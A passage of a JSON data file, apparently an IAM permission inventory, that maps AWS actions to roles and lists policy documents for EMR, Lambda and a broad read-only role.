null}}}}}}}},"workmail:listOrganizations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:listResourceDelegates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:listResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:listUsers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workspaces:describeAccount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workspaces:describeAccountModifications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workspaces:describeIpGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workspaces:describeTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workspaces:describeWorkspaceBundles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workspaces:describeWorkspaceDirectories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workspaces:describeWorkspaceImages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workspaces:describeWorkspaces": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workspaces:describeWorkspacesConnectionStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}}}},"policies": {"ANPAI4YEZURRMKACW56EA": {"PolicyDocument": {"Statement": [{"Action": ["ec2:DescribeInstances","ec2:DescribeLaunchTemplates","ec2:DescribeSpotInstanceRequests","ec2:DeleteLaunchTemplate","ec2:ModifyInstanceAttribute","ec2:TerminateInstances","ec2:CancelSpotInstanceRequests","ec2:DeleteNetworkInterface","ec2:DescribeInstanceAttribute","ec2:DescribeVolumeStatus","ec2:DescribeVolumes","ec2:DetachVolume","ec2:DeleteVolume","ec2:DescribePlacementGroups","ec2:DeletePlacementGroup"],"Effect": "Allow","Resource": ["*"]}],"Version": "2012-10-17"},"arn": "arn:aws:iam::aws:policy/aws-service-role/AmazonEMRCleanupPolicy","attached_to": {"roles": [{"id": "AROAJ2LRZXYT2USPF2ZTY","name": "AWSServiceRoleForEMRCleanup"}]},"id": "ANPAI4YEZURRMKACW56EA","name": "AmazonEMRCleanupPolicy"},"ANPAIDFYJXP7KKG7FLVWO": {"PolicyDocument": {"Statement": [{"Action": ["logs:CreateLogGroup"],"Effect": "Allow","Resource": ["arn:aws:logs:eu-west-1:430150006394:*"]},{"Action": ["logs:CreateLogStream","logs:PutLogEvents"],"Effect": "Allow","Resource": ["arn:aws:logs:eu-west-1:430150006394:log-group:/aws/lambda/load-wikipedia:*"]}],"Version": "2012-10-17"},"arn": "arn:aws:iam::430150006394:policy/service-role/AWSLambdaBasicExecutionRole-676647ec-377e-496c-8355-37f23bf12c85","attached_to": {"roles": [{"id": "AROAJY5MNJYDKGD2UIATQ","name": "load-wikipedia"}]},"id": "ANPAIDFYJXP7KKG7FLVWO","name": "AWSLambdaBasicExecutionRole-676647ec-377e-496c-8355-37f23bf12c85"},"ANPAIDI2BQT2LKXZG36TW": {"PolicyDocument": {"Statement": [{"Action": ["ec2:AuthorizeSecurityGroupEgress","ec2:AuthorizeSecurityGroupIngress","ec2:CancelSpotInstanceRequests","ec2:CreateFleet","ec2:CreateLaunchTemplate","ec2:CreateNetworkInterface","ec2:CreateSecurityGroup","ec2:CreateTags","ec2:DeleteLaunchTemplate","ec2:DeleteNetworkInterface","ec2:DeleteSecurityGroup","ec2:DeleteTags","ec2:DescribeAvailabilityZones","ec2:DescribeAccountAttributes","ec2:DescribeDhcpOptions","ec2:DescribeImages","ec2:DescribeInstanceStatus","ec2:DescribeInstances","ec2:DescribeKeyPairs","ec2:DescribeLaunchTemplates","ec2:DescribeNetworkAcls","ec2:DescribeNetworkInterfaces","ec2:DescribePrefixLists","ec2:DescribeRouteTables","ec2:DescribeSecurityGroups","ec2:DescribeSpotInstanceRequests","ec2:DescribeSpotPriceHistory","ec2:DescribeSubnets","ec2:DescribeTags","ec2:DescribeVpcAttribute","ec2:DescribeVpcEndpoints","ec2:DescribeVpcEndpointServices","ec2:DescribeVpcs","ec2:DetachNetworkInterface","ec2:ModifyImageAttribute","ec2:ModifyInstanceAttribute","ec2:RequestSpotInstances","ec2:RevokeSecurityGroupEgress","ec2:RunInstances","ec2:TerminateInstances","ec2:DeleteVolume","ec2:DescribeVolumeStatus","ec2:DescribeVolumes","ec2:DetachVolume","iam:GetRole","iam:GetRolePolicy","iam:ListInstanceProfiles","iam:ListRolePolicies","iam:PassRole","s3:CreateBucket","s3:Get*","s3:List*","sdb:BatchPutAttributes","sdb:Select","sqs:CreateQueue","sqs:Delete*","sqs:GetQueue*","sqs:PurgeQueue","sqs:ReceiveMessage","cloudwatch:PutMetricAlarm","cloudwatch:DescribeAlarms","cloudwatch:DeleteAlarms","application-autoscaling:RegisterScalableTarget","application-autoscaling:DeregisterScalableTarget","application-autoscaling:PutScalingPolicy","application-autoscaling:DeleteScalingPolicy","application-autoscaling:Describe*"],"Effect": "Allow","Resource": ["*"]},{"Action": ["iam:CreateServiceLinkedRole"],"Condition": {"StringLike": {"iam:AWSServiceName": "spot.amazonaws.com"}},"Effect": "Allow","Resource": ["arn:aws:iam::*:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot*"]}],"Version": "2012-10-17"},"arn": "arn:aws:iam::aws:policy/service-role/AmazonElasticMapReduceRole","attached_to": {"roles": [{"id": "AROAIXBSWIKGEEDLMO53I","name": "EMR_DefaultRole"}]},"id": "ANPAIDI2BQT2LKXZG36TW","name": "AmazonElasticMapReduceRole"},"ANPAIGALS5RCDLZLB3PGS": {"PolicyDocument": {"Statement": [{"Action": ["cloudwatch:*","dynamodb:*","ec2:Describe*","elasticmapreduce:Describe*","elasticmapreduce:ListBootstrapActions","elasticmapreduce:ListClusters","elasticmapreduce:ListInstanceGroups","elasticmapreduce:ListInstances","elasticmapreduce:ListSteps","kinesis:CreateStream","kinesis:DeleteStream","kinesis:DescribeStream","kinesis:GetRecords","kinesis:GetShardIterator","kinesis:MergeShards","kinesis:PutRecord","kinesis:SplitShard","rds:Describe*","s3:*","sdb:*","sns:*","sqs:*","glue:CreateDatabase","glue:UpdateDatabase","glue:DeleteDatabase","glue:GetDatabase","glue:GetDatabases","glue:CreateTable","glue:UpdateTable","glue:DeleteTable","glue:GetTable","glue:GetTables","glue:GetTableVersions","glue:CreatePartition","glue:BatchCreatePartition","glue:UpdatePartition","glue:DeletePartition","glue:BatchDeletePartition","glue:GetPartition","glue:GetPartitions","glue:BatchGetPartition","glue:CreateUserDefinedFunction","glue:UpdateUserDefinedFunction","glue:DeleteUserDefinedFunction","glue:GetUserDefinedFunction","glue:GetUserDefinedFunctions"],"Effect": "Allow","Resource": ["*"]}],"Version": "2012-10-17"},"arn": "arn:aws:iam::aws:policy/service-role/AmazonElasticMapReduceforEC2Role","attached_to": {"roles": [{"id": "AROAI265GPNVMDZAKJPPA","name": "EMR_EC2_DefaultRole"}]},"id": "ANPAIGALS5RCDLZLB3PGS","name": "AmazonElasticMapReduceforEC2Role"},"ANPAJ7W6266ELXF5MISDS": {"PolicyDocument": {"Statement": [{"Action": ["apigateway:GET"],"Effect": "Allow","Resource": ["arn:aws:apigateway:*::/account","arn:aws:apigateway:*::/apis","arn:aws:apigateway:*::/apis/*","arn:aws:apigateway:*::/apis/*/authorizers","arn:aws:apigateway:*::/apis/*/authorizers/*","arn:aws:apigateway:*::/apis/*/deployments","arn:aws:apigateway:*::/apis/*/deployments/*","arn:aws:apigateway:*::/apis/*/integrations","arn:aws:apigateway:*::/apis/*/integrations/*","arn:aws:apigateway:*::/apis/*/integrations/*/integrationresponses","arn:aws:apigateway:*::/apis/*/integrations/*/integrationresponses/*","arn:aws:apigateway:*::/apis/*/models","arn:aws:apigateway:*::/apis/*/models/*","arn:aws:apigateway:*::/apis/*/routes","arn:aws:apigateway:*::/apis/*/routes/*","arn:aws:apigateway:*::/apis/*/routes/*/routeresponses","arn:aws:apigateway:*::/apis/*/routes/*/routeresponses/*","arn:aws:apigateway:*::/apis/*/stages","arn:aws:apigateway:*::/apis/*/stages/*","arn:aws:apigateway:*::/clientcertificates","arn:aws:apigateway:*::/clientcertificates/*","arn:aws:apigateway:*::/domainnames","arn:aws:apigateway:*::/domainnames/*","arn:aws:apigateway:*::/domainnames/*/apimappings","arn:aws:apigateway:*::/domainnames/*/apimappings/*","arn:aws:apigateway:*::/domainnames/*/basepathmappings","arn:aws:apigateway:*::/domainnames/*/basepathmappings/*","arn:aws:apigateway:*::/restapis","arn:aws:apigateway:*::/restapis/*","arn:aws:apigateway:*::/restapis/*/authorizers","arn:aws:apigateway:*::/restapis/*/authorizers/*","arn:aws:apigateway:*::/restapis/*/deployments","arn:aws:apigateway:*::/restapis/*/deployments/*","arn:aws:apigateway:*::/restapis/*/models","arn:aws:apigateway:*::/restapis/*/models/*","arn:aws:apigateway:*::/restapis/*/models/*/default_template","arn:aws:apigateway:*::/restapis/*/resources","arn:aws:apigateway:*::/restapis/*/resources/*","arn:aws:apigateway:*::/restapis/*/resources/*/methods/*/integration/responses/*","arn:aws:apigateway:*::/restapis/*/resources/*/methods/*/responses/*","arn:aws:apigateway:*::/restapis/*/stages/*/sdks/*","arn:aws:apigateway:*::/restapis/*/resources/*/methods/*","arn:aws:apigateway:*::/restapis/*/resources/*/methods/*/integration","arn:aws:apigateway:*::/restapis/*/stages","arn:aws:apigateway:*::/restapis/*/stages/*"]},{"Action": ["iam:DeleteRole"],"Effect": "Allow","Resource": ["arn:aws:iam::*:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport"]},{"Action": ["a4b:getDevice","a4b:getProfile","a4b:getRoom","a4b:getRoomSkillParameter","a4b:getSkillGroup","a4b:searchDevices","a4b:searchProfiles","a4b:searchRooms","a4b:searchSkillGroups","access-analyzer:getFinding","access-analyzer:listAnalyzers","access-analyzer:listArchiveRules","access-analyzer:listFindings","acm-pca:describeCertificateAuthority","acm-pca:describeCertificateAuthorityAuditReport","acm-pca:getCertificate","acm-pca:getCertificateAuthorityCertificate","acm-pca:getCertificateAuthorityCsr","acm-pca:listCertificateAuthorities","acm-pca:listTags","acm:describeCertificate","acm:getCertificate","acm:listCertificates","acm:listTagsForCertificate","amplify:getApp","amplify:getBranch","amplify:getDomainAssociation","amplify:getJob","amplify:getWebhook","amplify:listApps","amplify:listWebhooks","application-autoscaling:describeScalableTargets","application-autoscaling:describeScalingActivities","application-autoscaling:describeScalingPolicies","application-autoscaling:describeScheduledActions","appmesh:describeMesh","appmesh:describeRoute","appmesh:describeVirtualNode","appmesh:describeVirtualRouter","appmesh:describeVirtualService","appmesh:listMeshes","appmesh:listRoutes","appmesh:listVirtualNodes","appmesh:listVirtualRouters","appmesh:listVirtualServices","appstream:describeDirectoryConfigs","appstream:describeFleets","appstream:describeImageBuilders","appstream:describeImages","appstream:describeSessions","appstream:describeStacks","appstream:listAssociatedFleets","appstream:listAssociatedStacks","appstream:listTagsForResource","appsync:getFunction","appsync:getGraphqlApi","appsync:getIntrospectionSchema","appsync:getResolver","appsync:getSchemaCreationStatus","appsync:getType","appsync:listDataSources","appsync:listFunctions","appsync:listGraphqlApis","appsync:listResolvers","appsync:listTypes","athena:batchGetNamedQuery","athena:batchGetQueryExecution","athena:getNamedQuery","athena:getQueryExecution","athena:getWorkGroup","athena:listNamedQueries","athena:listQueryExecutions","athena:listTagsForResource","athena:listWorkGroups","autoscaling-plans:describeScalingPlanResources","autoscaling-plans:describeScalingPlans","autoscaling-plans:getScalingPlanResourceForecastData","autoscaling:describeAccountLimits","autoscaling:describeAdjustmentTypes","autoscaling:describeAutoScalingGroups","autoscaling:describeAutoScalingInstances","autoscaling:describeAutoScalingNotificationTypes","autoscaling:describeLaunchConfigurations","autoscaling:describeLifecycleHookTypes","autoscaling:describeLifecycleHooks","autoscaling:describeLoadBalancerTargetGroups","autoscaling:describeLoadBalancers","autoscaling:describeMetricCollectionTypes","autoscaling:describeNotificationConfigurations","autoscaling:describePolicies","autoscaling:describeScalingActivities","autoscaling:describeScalingProcessTypes","autoscaling:describeScheduledActions","autoscaling:describeTags","autoscaling:describeTerminationPolicyTypes","backup:describeBackupJob","backup:describeBackupVault","backup:describeProtectedResource","backup:describeRecoveryPoint","backup:describeRestoreJob","backup:getBackupPlan","backup:getBackupPlanFromJSON","backup:getBackupPlanFromTemplate","backup:getBackupSelection","backup:getBackupVaultAccessPolicy","backup:getBackupVaultNotifications","backup:getRecoveryPointRestoreMetadata","backup:getSupportedResourceTypes","backup:listBackupJobs","backup:listBackupPlanTemplates","backup:listBackupPlanVersions","backup:listBackupPlans","backup:listBackupSelections","backup:listBackupVaults","backup:listProtectedResources","backup:listRecoveryPointsByBackupVault","backup:listRecoveryPointsByResource","backup:listRestoreJobs","backup:listTags","batch:describeComputeEnvironments","batch:describeJobDefinitions","batch:describeJobQueues","batch:describeJobs","batch:listJobs","braket:getDevice","braket:getQuantumTask","braket:searchDevices","braket:searchQuantumTasks","budgets:viewBudget","ce:getCostAndUsage","ce:getDimensionValues","ce:getReservationCoverage","ce:getReservationUtilization","ce:getTags","cloud9:describeEnvironmentMemberships","cloud9:describeEnvironments","cloud9:listEnvironments","clouddirectory:getDirectory","clouddirectory:listDirectories","cloudformation:describeAccountLimits","cloudformation:describeChangeSet","cloudformation:describeStackEvents","cloudformation:describeStackInstance","cloudformation:describeStackResource","cloudformation:describeStackResources","cloudformation:describeStackSet","cloudformation:describeStackSetOperation","cloudformation:describeStacks","cloudformation:estimateTemplateCost","cloudformation:getStackPolicy","cloudformation:getTemplate","cloudformation:getTemplateSummary","cloudformation:listChangeSets","cloudformation:listExports","cloudformation:listImports","cloudformation:listStackInstances","cloudformation:listStackResources","cloudformation:listStackSetOperationResults","cloudformation:listStackSetOperations","cloudformation:listStackSets","cloudformation:listStacks","cloudfront:getCloudFrontOriginAccessIdentity","cloudfront:getCloudFrontOriginAccessIdentityConfig","cloudfront:getDistribution","cloudfront:getDistributionConfig","cloudfront:getInvalidation","cloudfront:getStreamingDistribution","cloudfront:getStreamingDistributionConfig","cloudfront:listCloudFrontOriginAccessIdentities","cloudfront:listDistributions","cloudfront:listDistributionsByWebACLId","cloudfront:listInvalidations","cloudfront:listStreamingDistributions","cloudhsm:describeBackups","cloudhsm:describeClusters","cloudsearch:describeAnalysisSchemes","cloudsearch:describeAvailabilityOptions","cloudsearch:describeDomains","cloudsearch:describeExpressions","cloudsearch:describeIndexFields","cloudsearch:describeScalingParameters","cloudsearch:describeServiceAccessPolicies","cloudsearch:describeSuggesters","cloudsearch:listDomainNames","cloudtrail:describeTrails","cloudtrail:getEventSelectors","cloudtrail:getInsightSelectors","cloudtrail:getTrail","cloudtrail:getTrailStatus","cloudtrail:listPublicKeys","cloudtrail:listTags","cloudtrail:listTrails","cloudtrail:lookupEvents","cloudwatch:describeAlarmHistory","cloudwatch:describeAlarms","cloudwatch:describeAlarmsForMetric","cloudwatch:getDashboard","cloudwatch:getMetricData","cloudwatch:getMetricStatistics","cloudwatch:listDashboards","cloudwatch:listMetrics","codeartifact:describeDomain","codeartifact:describePackageVersion","codeartifact:describeRepository","codeartifact:getDomainPermissionsPolicy","codeartifact:getRepositoryEndPoint","codeartifact:getRepositoryPermissionsPolicy","codeartifact:listDomains","codeartifact:listPackageVersionAssets","codeartifact:listPackageVersions","codeartifact:listPackages","codeartifact:listRepositories","codeartifact:listRepositoriesInDomain","codebuild:batchGetBuildBatches","codebuild:batchGetBuilds","codebuild:batchGetProjects","codebuild:listBuildBatches","codebuild:listBuildBatchesForProject","codebuild:listBuilds","codebuild:listBuildsForProject","codebuild:listCuratedEnvironmentImages","codebuild:listProjects","codebuild:listSourceCredentials","codecommit:batchGetRepositories","codecommit:getBranch","codecommit:getRepository","codecommit:getRepositoryTriggers","codecommit:listBranches","codecommit:listRepositories","codedeploy:batchGetApplicationRevisions","codedeploy:batchGetApplications","codedeploy:batchGetDeploymentGroups","codedeploy:batchGetDeploymentInstances","codedeploy:batchGetDeploymentTargets","codedeploy:batchGetDeployments","codedeploy:batchGetOnPremisesInstances","codedeploy:getApplication","codedeploy:getApplicationRevision","codedeploy:getDeployment","codedeploy:getDeploymentConfig","codedeploy:getDeploymentGroup","codedeploy:getDeploymentInstance","codedeploy:getDeploymentTarget","codedeploy:getOnPremisesInstance","codedeploy:listApplicationRevisions","codedeploy:listApplications","codedeploy:listDeploymentConfigs","codedeploy:listDeploymentGroups","codedeploy:listDeploymentInstances","codedeploy:listDeploymentTargets","codedeploy:listDeployments","codedeploy:listGitHubAccountTokenNames","codedeploy:listOnPremisesInstances","codepipeline:getJobDetails","codepipeline:getPipeline","codepipeline:getPipelineExecution","codepipeline:getPipelineState","codepipeline:listActionExecutions","codepipeline:listActionTypes","codepipeline:listPipelineExecutions","codepipeline:listPipelines","codepipeline:listWebhooks","codestar:describeProject","codestar:listProjects","codestar:listResources","codestar:listTeamMembers","codestar:listUserProfiles","cognito-identity:describeIdentityPool","cognito-identity:getIdentityPoolRoles","cognito-identity:listIdentities","cognito-identity:listIdentityPools","cognito-idp:adminGetUser","cognito-idp:describeIdentityProvider","cognito-idp:describeResourceServer","cognito-idp:describeRiskConfiguration","cognito-idp:describeUserImportJob","cognito-idp:describeUserPool","cognito-idp:describeUserPoolClient","cognito-idp:describeUserPoolDomain","cognito-idp:getGroup","cognito-idp:getUICustomization","cognito-idp:getUser","cognito-idp:getUserPoolMfaConfig","cognito-idp:listGroups","cognito-idp:listIdentityProviders","cognito-idp:listResourceServers","cognito-idp:listUserImportJobs","cognito-idp:listUserPoolClients","cognito-idp:listUserPools","cognito-sync:describeDataset","cognito-sync:describeIdentityPoolUsage","cognito-sync:describeIdentityUsage","cognito-sync:getCognitoEvents","cognito-sync:getIdentityPoolConfiguration","cognito-sync:listDatasets","cognito-sync:listIdentityPoolUsage","compute-optimizer:getAutoScalingGroupRecommendations","compute-optimizer:getEC2InstanceRecommendations","compute-optimizer:getEC2RecommendationProjectedMetrics","compute-optimizer:getEnrollmentStatus","compute-optimizer:getRecommendationSummaries","config:describeConfigRuleEvaluationStatus","config:describeConfigRules","config:describeConfigurationRecorderStatus","config:describeConfigurationRecorders","config:describeDeliveryChannelStatus","config:describeDeliveryChannels","config:getResourceConfigHistory","config:listDiscoveredResources","connect:describeUser","connect:getCurrentMetricData","connect:getMetricData","connect:listRoutingProfiles","connect:listSecurityProfiles","connect:listUsers","controltower:describeAccountFactoryConfig","controltower:describeCoreService","controltower:describeGuardrail","controltower:describeGuardrailForTarget","controltower:describeManagedAccount","controltower:describeSingleSignOn","controltower:getAvailableUpdates","controltower:getHomeRegion","controltower:getLandingZoneStatus","controltower:listDirectoryGroups","controltower:listGuardrailViolations","controltower:listGuardrailsForTarget","controltower:listManagedAccounts","controltower:listManagedAccountsForGuardrail","controltower:listManagedAccountsForParent","controltower:listManagedOrganizationalUnits","controltower:listManagedOrganizationalUnitsForGuardrail","datapipeline:describeObjects","datapipeline:describePipelines","datapipeline:getPipelineDefinition","datapipeline:listPipelines","datapipeline:queryObjects","datasync:describeAgent","datasync:describeLocationEfs","datasync:describeLocationFsxWindows","datasync:describeLocationNfs","datasync:describeLocationS3","datasync:describeLocationSmb","datasync:describeTask","datasync:describeTaskExecution","datasync:listAgents","datasync:listLocations","datasync:listTaskExecutions","datasync:listTasks","dax:describeClusters","dax:describeDefaultParameters","dax:describeEvents","dax:describeParameterGroups","dax:describeParameters","dax:describeSubnetGroups","detective:getMembers","detective:listGraphs","detective:listInvitations","detective:listMembers","devicefarm:getAccountSettings","devicefarm:getDevice","devicefarm:getDevicePool","devicefarm:getDevicePoolCompatibility","devicefarm:getJob","devicefarm:getProject","devicefarm:getRemoteAccessSession","devicefarm:getRun","devicefarm:getSuite","devicefarm:getTest","devicefarm:getTestGridProject","devicefarm:getTestGridSession","devicefarm:getUpload","devicefarm:listArtifacts","devicefarm:listDevicePools","devicefarm:listDevices","devicefarm:listJobs","devicefarm:listProjects","devicefarm:listRemoteAccessSessions","devicefarm:listRuns","devicefarm:listSamples","devicefarm:listSuites","devicefarm:listTestGridProjects","devicefarm:listTestGridSessionActions","devicefarm:listTestGridSessionArtifacts","devicefarm:listTestGridSessions","devicefarm:listTests","devicefarm:listUniqueProblems","devicefarm:listUploads","directconnect:describeConnections","directconnect:describeConnectionsOnInterconnect","directconnect:describeInterconnects","directconnect:describeLocations","directconnect:describeVirtualGateways","directconnect:describeVirtualInterfaces","dlm:getLifecyclePolicies","dlm:getLifecyclePolicy","dms:describeAccountAttributes","dms:describeConnections","dms:describeEndpointTypes","dms:describeEndpoints","dms:describeOrderableReplicationInstances","dms:describeRefreshSchemasStatus","dms:describeReplicationInstances","dms:describeReplicationSubnetGroups","ds:describeConditionalForwarders","ds:describeDirectories","ds:describeEventTopics","ds:describeSnapshots","ds:describeTrusts","ds:getDirectoryLimits","ds:getSnapshotLimits","ds:listIpRoutes","ds:listSchemaExtensions","ds:listTagsForResource","dynamodb:describeBackup","dynamodb:describeContinuousBackups","dynamodb:describeGlobalTable","dynamodb:describeLimits","dynamodb:describeStream","dynamodb:describeTable","dynamodb:describeTimeToLive","dynamodb:listBackups","dynamodb:listGlobalTables","dynamodb:listStreams","dynamodb:listTables","dynamodb:listTagsOfResource","ec2:acceptReservedInstancesExchangeQuote","ec2:cancelReservedInstancesListing","ec2:createReservedInstancesListing","ec2:describeAccountAttributes","ec2:describeAddresses","ec2:describeAvailabilityZones","ec2:describeBundleTasks","ec2:describeByoipCidrs","ec2:describeCapacityReservations","ec2:describeClassicLinkInstances","ec2:describeClientVpnAuthorizationRules","ec2:describeClientVpnConnections","ec2:describeClientVpnEndpoints","ec2:describeClientVpnRoutes","ec2:describeClientVpnTargetNetworks","ec2:describeCoipPools","ec2:describeConversionTasks","ec2:describeCustomerGateways","ec2:describeDhcpOptions","ec2:describeElasticGpus","ec2:describeExportImageTasks","ec2:describeExportTasks","ec2:describeFastSnapshotRestores","ec2:describeFleetHistory","ec2:describeFleetInstances","ec2:describeFleets","ec2:describeFlowLogs","ec2:describeHostReservationOfferings","ec2:describeHostReservations","ec2:describeHosts","ec2:describeIdFormat","ec2:describeIdentityIdFormat","ec2:describeImageAttribute","ec2:describeImages","ec2:describeImportImageTasks","ec2:describeImportSnapshotTasks","ec2:describeInstanceAttribute","ec2:describeInstanceStatus","ec2:describeInstances","ec2:describeInternetGateways","ec2:describeKeyPairs","ec2:describeLaunchTemplateVersions","ec2:describeLaunchTemplates","ec2:describeLocalGatewayRouteTableVirtualInterfaceGroupAssociations","ec2:describeLocalGatewayRouteTableVpcAssociations","ec2:describeLocalGatewayRouteTables","ec2:describeLocalGatewayVirtualInterfaceGroups","ec2:describeLocalGatewayVirtualInterfaces","ec2:describeLocalGateways","ec2:describeMovingAddresses","ec2:describeNatGateways","ec2:describeNetworkAcls","ec2:describeNetworkInterfaceAttribute","ec2:describeNetworkInterfaces","ec2:describePlacementGroups","ec2:describePrefixLists","ec2:describePublicIpv4Pools","ec2:describeRegions","ec2:describeReservedInstances","ec2:describeReservedInstancesListings","ec2:describeReservedInstancesModifications","ec2:describeReservedInstancesOfferings","ec2:describeRouteTables","ec2:describeScheduledInstances","ec2:describeSecurityGroups","ec2:describeSnapshotAttribute","ec2:describeSnapshots","ec2:describeSpotDatafeedSubscription","ec2:describeSpotFleetInstances","ec2:describeSpotFleetRequestHistory","ec2:describeSpotFleetRequests","ec2:describeSpotInstanceRequests","ec2:describeSpotPriceHistory","ec2:describeSubnets","ec2:describeTags","ec2:describeTrafficMirrorFilters","ec2:describeTrafficMirrorSessions","ec2:describeTrafficMirrorTargets","ec2:describeTransitGatewayAttachments","ec2:describeTransitGatewayRouteTables","ec2:describeTransitGatewayVpcAttachments","ec2:describeTransitGateways","ec2:describeVolumeAttribute","ec2:describeVolumeStatus","ec2:describeVolumes","ec2:describeVolumesModifications","ec2:describeVpcAttribute","ec2:describeVpcClassicLink","ec2:describeVpcClassicLinkDnsSupport","ec2:describeVpcEndpointConnectionNotifications","ec2:describeVpcEndpointConnections","ec2:describeVpcEndpointServiceConfigurations","ec2:describeVpcEndpointServicePermissions","ec2:describeVpcEndpointServices","ec2:describeVpcEndpoints","ec2:describeVpcPeeringConnections","ec2:describeVpcs","ec2:describeVpnConnections","ec2:describeVpnGateways","ec2:getCoipPoolUsage","ec2:getConsoleScreenshot","ec2:getReservedInstancesExchangeQuote","ec2:getTransitGatewayAttachmentPropagations","ec2:getTransitGatewayRouteTableAssociations","ec2:getTransitGatewayRouteTablePropagations","ec2:modifyReservedInstances","ec2:purchaseReservedInstancesOffering","ec2:searchLocalGatewayRoutes","ecr:batchCheckLayerAvailability","ecr:describeImages","ecr:describeRepositories","ecr:getRepositoryPolicy","ecr:listImages","ecs:describeClusters","ecs:describeContainerInstances","ecs:describeServices","ecs:describeTaskDefinition","ecs:describeTasks","ecs:listClusters","ecs:listContainerInstances","ecs:listServices","ecs:listTaskDefinitions","ecs:listTasks","eks:describeCluster","eks:describeFargateProfile","eks:describeNodegroup","eks:describeUpdate","eks:listClusters","eks:listFargateProfiles","eks:listNodegroups","eks:listUpdates","elasticache:describeCacheClusters","elasticache:describeCacheEngineVersions","elasticache:describeCacheParameterGroups","elasticache:describeCacheParameters","elasticache:describeCacheSecurityGroups","elasticache:describeCacheSubnetGroups","elasticache:describeEngineDefaultParameters","elasticache:describeEvents","elasticache:describeReplicationGroups","elasticache:describeReservedCacheNodes","elasticache:describeReservedCacheNodesOfferings","elasticache:describeSnapshots","elasticache:listAllowedNodeTypeModifications","elasticache:listTagsForResource","elasticbeanstalk:checkDNSAvailability","elasticbeanstalk:describeApplicationVersions","elasticbeanstalk:describeApplications","elasticbeanstalk:describeConfigurationOptions","elasticbeanstalk:describeConfigurationSettings","elasticbeanstalk:describeEnvironmentHealth","elasticbeanstalk:describeEnvironmentManagedActionHistory","elasticbeanstalk:describeEnvironmentManagedActions","elasticbeanstalk:describeEnvironmentResources","elasticbeanstalk:describeEnvironments","elasticbeanstalk:describeEvents","elasticbeanstalk:describeInstancesHealth","elasticbeanstalk:describePlatformVersion","elasticbeanstalk:listAvailableSolutionStacks","elasticbeanstalk:listPlatformVersions","elasticbeanstalk:validateConfigurationSettings","elasticfilesystem:describeAccessPoints","elasticfilesystem:describeFileSystemPolicy","elasticfilesystem:describeFileSystems","elasticfilesystem:describeLifecycleConfiguration","elasticfilesystem:describeMountTargetSecurityGroups","elasticfilesystem:describeMountTargets","elasticfilesystem:describeTags","elasticfilesystem:listTagsForResource","elasticloadbalancing:describeInstanceHealth","elasticloadbalancing:describeListenerCertificates","elasticloadbalancing:describeListeners","elasticloadbalancing:describeLoadBalancerAttributes","elasticloadbalancing:describeLoadBalancerPolicies","elasticloadbalancing:describeLoadBalancerPolicyTypes","elasticloadbalancing:describeLoadBalancers","elasticloadbalancing:describeRules","elasticloadbalancing:describeSSLPolicies","elasticloadbalancing:describeTags","elasticloadbalancing:describeTargetGroupAttributes","elasticloadbalancing:describeTargetGroups","elasticloadbalancing:describeTargetHealth","elasticmapreduce:describeCluster","elasticmapreduce:describeSecurityConfiguration","elasticmapreduce:describeStep","elasticmapreduce:listBootstrapActions","elasticmapreduce:listClusters","elasticmapreduce:listInstanceGroups","elasticmapreduce:listInstances","elasticmapreduce:listSecurityConfigurations","elasticmapreduce:listSteps","elastictranscoder:listJobsByPipeline","elastictranscoder:listJobsByStatus","elastictranscoder:listPipelines","elastictranscoder:listPresets","elastictranscoder:readPipeline","elastictranscoder:readPreset","es:describeElasticsearchDomain","es:describeElasticsearchDomainConfig","es:describeElasticsearchDomains","es:listDomainNames","es:listTags","events:describeEventBus","events:describeRule","events:listRuleNamesByTarget","events:listRules","events:listTargetsByRule","events:testEventPattern","firehose:describeDeliveryStream","firehose:listDeliveryStreams","fms:getAdminAccount","fms:getComplianceDetail","fms:getNotificationChannel","fms:getPolicy","fms:getProtectionStatus","fms:listComplianceStatus","fms:listMemberAccounts","fms:listPolicies","forecast:describeDataset","forecast:describeDatasetGroup","forecast:describeDatasetImportJob","forecast:describeForecast","forecast:describeForecastExportJob","forecast:describePredictor","forecast:getAccuracyMetrics","forecast:listDatasetGroups","forecast:listDatasetImportJobs","forecast:listDatasets","forecast:listForecastExportJobs","forecast:listForecasts","forecast:listPredictors","fsx:describeBackups","fsx:describeFileSystems","fsx:listTagsForResource","glacier:describeJob","glacier:describeVault","glacier:getDataRetrievalPolicy","glacier:getVaultAccessPolicy